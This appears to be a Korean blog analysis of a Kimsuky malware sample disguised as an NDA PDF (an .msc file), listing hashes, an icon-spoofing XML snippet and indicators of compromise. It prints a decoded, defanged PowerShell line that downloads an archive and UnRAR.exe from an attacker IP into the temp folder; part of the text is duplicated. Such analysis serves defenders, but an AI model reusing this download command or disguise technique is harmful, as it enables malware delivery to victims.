북한 해킹 조직 김수키(Kimsuky) 위장한 NDA 문서형 악성코드 유포-NDA.pdf.msc 파일 주의(2025.5.4)
Contents
오늘도 우리 주적 북한 해킹 조직 김수키(Kimsuky)에서 만든 NDA.pdf.msc 악성코드에 대해 알아보겠습니다.
여기서 NDA는 비밀유지계약(Non-Disclosure Agreement) 의 약자이며 두 당사자 간에 서로 비밀 정보를 공유할 때 해당 정보를 외부로 유출하지 않겠다는 법적 약속을 담고 있습니다.
해당 악성코드는 순수하게 아이콘만 보았을 때 PDF 파일로 보이지만 윈도우 에서 확장자를 보게 설정을 했을 때는 msc 확장자인 것을 확인할 수가 있으며 일단 간단하게 먼저 해쉬 부터 알아보겠습니다.
파일명:NDA.pdf.msc
사이즈:1 MB
MD5:51c83329bb364483f122accf36ebfe76
SHA-1:4ebfb03a1339cb86051ce685c3e09c9435fd8691
SHA-256:bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61
입니다.
악성코드 포함된 코드
<VisualAttributes>
<String Name="ApplicationTitle" ID="14"/>
<Icon Index="11" File="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe">
<Image Name="Large" BinaryRefIndex="0"/>
<Image Name="Small" BinaryRefIndex="1"/>
<Image Name="Large48x" BinaryRefIndex="2"/>
</Icon>
분석:
ID=14: 문자열 리소스에서 ID가 14인 항목을 참조하여 프로그램 이름을 표시
File="C:\Program Files (x86)\Microsoft\Edge\Application\msedge(.)exe":해당 속성은 아이콘 이미지 파일의 경로를 나타내며
경로를 통해 해당 아이콘이 Microsoft Edge 웹 브라우저의 실행 파일에서 가져오는 것을 확인할 수가 있습니다.
그리고 밑에 쭉 내려가다 보면 Base 64로 악성코드가 인코딩돼 있기 때문에 CyberChef(사이버셰프)를 통해서 쉽게 확인을 할 수가 있습니다.
단 사람 귀찮게 base64 를 3번 벗겨야 함. 사람 귀찮게 양파도 아니고...
그러면 다음과 같은 최종적인 결과를 확보할 수가 있습니다.
iwr -Uri "hxxp://109(.)107(.)157.107/kaptsole_x(.)rar" -OutFile "$env:TEMP\ka
ptsole_x.rar";iwr -Uri "hxxp://109(.)107(.)157(.)107/UnRAR(.)exe" -OutFile "$e
nv:TEMP\UnRAR.exe"; …
여기서 NDA는 비밀유지계약(Non-Disclosure Agreement) 의 약자이며 두 당사자 간에 서로 비밀 정보를 공유할 때 해당 정보를 외부로 유출하지 않겠다는 법적 약속을 담고 있습니다.
해당 악성코드는 순수하게 아이콘만 보았을 때 PDF 파일로 보이지만 윈도우 에서 확장자를 보게 설정을 했을 때는 msc 확장자인 것을 확인할 수가 있으며 일단 간단하게 먼저 해쉬 부터 알아보겠습니다.
파일명:NDA.pdf.msc
사이즈:1 MB
MD5:51c83329bb364483f122accf36ebfe76
SHA-1:4ebfb03a1339cb86051ce685c3e09c9435fd8691
SHA-256:bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61
입니다.
악성코드 포함된 코드
<VisualAttributes>
<String Name="ApplicationTitle" ID="14"/>
<Icon Index="11" File="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe">
<Image Name="Large" BinaryRefIndex="0"/>
<Image Name="Small" BinaryRefIndex="1"/>
<Image Name="Large48x" BinaryRefIndex="2"/>
</Icon>
분석:
ID=14: 문자열 리소스에서 ID가 14인 항목을 참조하여 프로그램 이름을 표시
File="C:\Program Files (x86)\Microsoft\Edge\Application\msedge(.)exe":해당 속성은 아이콘 이미지 파일의 경로를 나타내며
경로를 통해 해당 아이콘이 Microsoft Edge 웹 브라우저의 실행 파일에서 가져오는 것을 확인할 수가 있습니다.
그리고 밑에 쭉 내려가다 보면 Base 64로 악성코드가 인코딩돼 있기 때문에 CyberChef(사이버셰프)를 통해서 쉽게 확인을 할 수가 있습니다.
단 사람 귀찮게 base64 를 3번 벗겨야 함. 사람 귀찮게 양파도 아니고...
그러면 다음과 같은 최종적인 결과를 확보할 수가 있습니다.
iwr -Uri "hxxp://109(.)107(.)157.107/kaptsole_x(.)rar" -OutFile "$env:TEMP\ka
ptsole_x.rar";iwr -Uri "hxxp://109(.)107(.)157(.)107/UnRAR(.)exe" -OutFile "$e
nv:TEMP\UnRAR.exe"; …
IoC
bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61
4ebfb03a1339cb86051ce685c3e09c9435fd8691
51c83329bb364483f122accf36ebfe76
4ebfb03a1339cb86051ce685c3e09c9435fd8691
51c83329bb364483f122accf36ebfe76